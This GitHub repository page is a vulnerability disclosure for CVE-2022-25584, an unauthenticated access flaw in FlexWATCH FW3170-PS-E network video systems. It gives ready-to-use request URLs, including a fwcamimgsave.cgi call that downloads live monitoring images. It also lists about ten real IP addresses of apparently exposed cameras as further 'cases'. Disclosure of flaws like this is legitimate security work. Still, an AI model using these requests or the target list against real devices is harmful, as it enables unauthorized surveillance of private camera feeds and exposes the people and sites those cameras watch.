Skip to content

NSSCYCTFER/Flexwatch

main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Code

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 

Flexwatch

Flexwatch-CVE

This document is for CVE-2022-25584 "RESERVED"

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25584

image

This vulnerability has been indexed by CNVD, but has not yet been made public

CNVD ID:CNVD-2021-103443

image

Vulnerability to reproduce:

We found that the FlexWATCH FW3170-PS-E Network Video System 4.23-3000_GY owned by Seyeon Tech Co., Ltd. has an unauthenticated access vulnerability, which can be exploited by attackers to obtain monitoring images and leak sensitive information

For example:

http://211.174.227.102:10001/app/multi/single.asp

image

Then,we can visit:http://211.174.227.102:10001/cgi-bin/fwcamimgsave.cgi?FwModId=0&PortId=0&FwCgiVer=0x0001

Download monitoring real-time screen

image

image

Company official website:http://www.flexwatch.com/

Other cases:

http://211.240.10.38:10001/app/multi/single.asp

http://121.133.21.35:10001/app/multi/single.asp

http://210.223.145.159:10001/app/multi/single.asp

http://115.142.194.178:10001/app/multi/single.asp

http://115.142.194.178:10001/app/multi/single.asp

http://27.1.124.18:10001/app/multi/single.asp

http://183.100.61.196:10001/app/multi/single.asp

http://118.176.196.247:10001/app/multi/single.asp

http://211.36.62.253:10001/app/multi/single.asp

http://211.174.227.230:10001/app/multi/single.asp

About

Flexwatch-CVE

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published